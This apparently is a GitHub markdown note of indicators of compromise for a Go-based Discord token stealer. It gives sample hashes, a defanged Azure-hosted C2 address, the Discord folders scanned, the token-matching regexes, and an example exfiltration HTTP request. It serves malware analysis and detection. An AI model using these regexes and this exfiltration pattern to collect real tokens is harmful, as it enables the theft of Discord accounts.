Skip to content

Latest commit

 

History

History
58 lines (39 loc) · 1.05 KB

dd9500549f285c9095198f81a1aeff4910dd361ee79ed0fb9bc103e3a70837c5.md

File metadata and controls

58 lines (39 loc) · 1.05 KB

dd9500549f285c9095198f81a1aeff4910dd361ee79ed0fb9bc103e3a70837c5

centralcity.brazilsouth.cloudapp[.]azure[.]com 191.239.244.78

checks for

Roaming\discord
Roaming\discordptb
Roaming\discordcanary

If found checks files in Local Storage\leveldb\ for tokens by reading files and using regex patterns

mfa\.[\w-]{84}
[\w-]{24}\.[\w-]{6}\.[\w-]{27}

Sends data to

hxxp://centralcity.brazilsouth.cloudapp[.]azure[.]com/brancao

Another sample: c16c3e17fa5eb849033825b24c813242be3fcd9e1b48ea52c816a9b0b8d6e856

hxxp://centralcity.brazilsouth.cloudapp[.]azure[.]com/wl

Another sample: ced418253024655d11588b97aba24aad3e80d215a1ed4ca1f7a8bf8ecf623216

hxxp://centralcity.brazilsouth.cloudapp[.]azure[.]com/tokyo

C2 traffic would look like this

GET /brancao HTTP/1.1
Host: centralcity.brazilsouth.cloudapp[.]azure[.]com
User-Agent: Go-http-client/1.1
Content-Length: 23
Sharkflow: mfa.012345678901234567890123456789012345678901234567890123456789012345678901234567891234
Accept-Encoding: gzip

{"foda-se": "kkkkkkkk"}